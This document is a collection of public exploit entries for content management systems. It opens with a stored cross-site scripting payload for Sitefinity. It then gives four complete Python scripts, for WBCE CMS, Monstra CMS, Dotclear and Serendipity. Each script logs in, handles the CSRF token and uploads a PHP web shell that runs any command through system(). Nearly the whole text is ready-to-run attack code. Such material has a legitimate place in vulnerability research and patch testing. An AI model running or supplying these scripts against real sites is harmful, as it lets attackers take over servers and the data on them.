# Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS) # Date: 2023-12-05 # Exploit Author: Aldi Saputra Wahyudi # Vendor Homepage: https://www.progress.com/sitefinity-cms # Version: < 15.0.0 # Tested on: Windows/Linux # CVE : CVE-2023-27636 # Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor # Steps To Reproduce: Attacker as lower privilege Victim as Higher privilege 1. Login as an Attacker 2. Go to the function using the SF Editor, go to the news page as example 3. Create or Edit news item 4. On the content form, insert the XSS payload as HTML 5. After the payload is inserted, click on the content form (just click) and publish or save 6. If the victim visits the page with XSS payload, XSS will be triggered Payload: <noalert><iframe src="javascript:alert(document.domain);">

# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE) # Date: 3/5/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip # Version: 1.6.2 # Tested on: MacOS import requests from bs4 import BeautifulSoup import sys import time def login(url, username, password): print("Logging in...") time.sleep(3) with requests.Session() as session: response = session.get(url + "/admin/login/index.php") soup = BeautifulSoup(response.text, 'html.parser') form = soup.find('form', attrs={'name': 'login'}) form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'} # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password post_response = session.post(url + "/admin/login/index.php", data=form_data) if "Administration" in post_response.text: print("Login successful!") time.sleep(3) return session else: print("Login failed.") print("Headers received:", post_response.headers) print("Response content:", post_response.text[:500]) # İlk 500 karakter return None def upload_file(session, url): # Dosya içeriğini ve adını belirleyin print("Shell preparing...") time.sleep(3) files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')} data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' } response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data) if response.status_code == 200: print("Your Shell is Ready: " + url + "/media/shell.inc") else: print("Failed to upload file.") print(response.text) if __name__ == "__main__": url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(url, username, password) if session: upload_file(session, url)

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE) # Date: 05.05.2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: MacOS import requests import random import string import time import re import sys if len(sys.argv) < 4: print("Usage: python3 script.py <url> <username> <password>") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() login_url = f'{base_url}/admin/index.php?id=dashboard' login_data = { 'login': username, 'password': password, 'login_submit': 'Log+In' } filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k= 5)) print("Logging in...") response = session.post(login_url, data=login_data) if 'Dashboard' in response.text: print("Login successful") else: print("Login failed") exit() time.sleep(3) edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk' response = session.get(edit_url) # CSRF token bulmak için edit sayfasına erişim token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value=" (.*?)"', response.text) if token_search: token = token_search.group(1) else: print("CSRF token could not be found.") exit() content = ''' <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ''' edit_data = { 'csrf': token, 'name': filename, 'content': content, 'add_file': 'Save' } print("Preparing shell...") response = session.post(edit_url, data=edit_data) time.sleep(3) if response.status_code == 200: print(f"Your shell is ready: {base_url}/public/themes/default/{filename} .chunk.php") else: print("Failed to prepare shell.")

# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://git.dotclear.org/explore/repos # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip # Tested Version: v2.29 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response_text): soup = BeautifulSoup(response_text, 'html.parser') token = soup.find('input', {'name': 'xd_check'}) return token['value'] if token else None def login(base_url, username, password): print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) session = requests.Session() login_data = { "user_id": username, "user_pwd": password } login_url = f"{base_url}/admin/index.php?process=Auth" login_response = session.post(login_url, data=login_data) if "Logout" in login_response.text: print("Login Successful!") return session else: print("Login Failed!") return None def upload_file(session, base_url, filename): print("Shell Preparing...") time.sleep(1) boundary = "---------------------------376201441124932790524235275389" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "X-Requested-With": "XMLHttpRequest" } csrf_token = get_csrf_token(session.get(f"{base_url} /admin/index.php?process=Media").text) payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n" f"2097152\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n" f"{csrf_token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename} \"\r\n" f"Content-Type: image/jpeg\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) upload_response = session.post(f"{base_url} /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0", headers=headers, data=payload.encode('utf-8')) if upload_response.status_code == 200: print(f"Your Shell is Ready: {base_url}/public/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: upload_file(session, base_url, filename) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main(base_url, username, password)

# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://docs.s9y.org/ # Software Link:https://www.s9y.org/latest # Tested Version: v2.5.0 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response): soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'serendipity[token]'}) return token['value'] if token else None def login(base_url, username, password): print("Logging in...") time.sleep(2) session = requests.Session() login_page = session.get(f"{base_url}/serendipity_admin.php") token = get_csrf_token(login_page) data = { "serendipity[action]": "admin", "serendipity[user]": username, "serendipity[pass]": password, "submit": "Login", "serendipity[token]": token } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{base_url}/serendipity_admin.php" } response = session.post(f"{base_url}/serendipity_admin.php", data=data, headers=headers) if "Add media" in response.text: print("Login Successful!") time.sleep(2) return session else: print("Login Failed!") return None def upload_file(session, base_url, filename, token): print("Shell Preparing...") time.sleep(2) boundary = "---------------------------395233558031804950903737832368" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Referer": f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media" } payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" f"{token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" f"admin\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" f"media\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" f"add\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"{filename}\"\r\n" f"Content-Type: text/html\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) response = session.post(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media", headers=headers, data=payload.encode('utf-8')) if f"File {filename} successfully uploaded as" in response.text: print(f"Your shell is ready: {base_url}/uploads/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: token = get_csrf_token(session.get(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media")) upload_file(session, base_url, filename, token) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: main(sys.argv[1], sys.argv[2], sys.argv[3])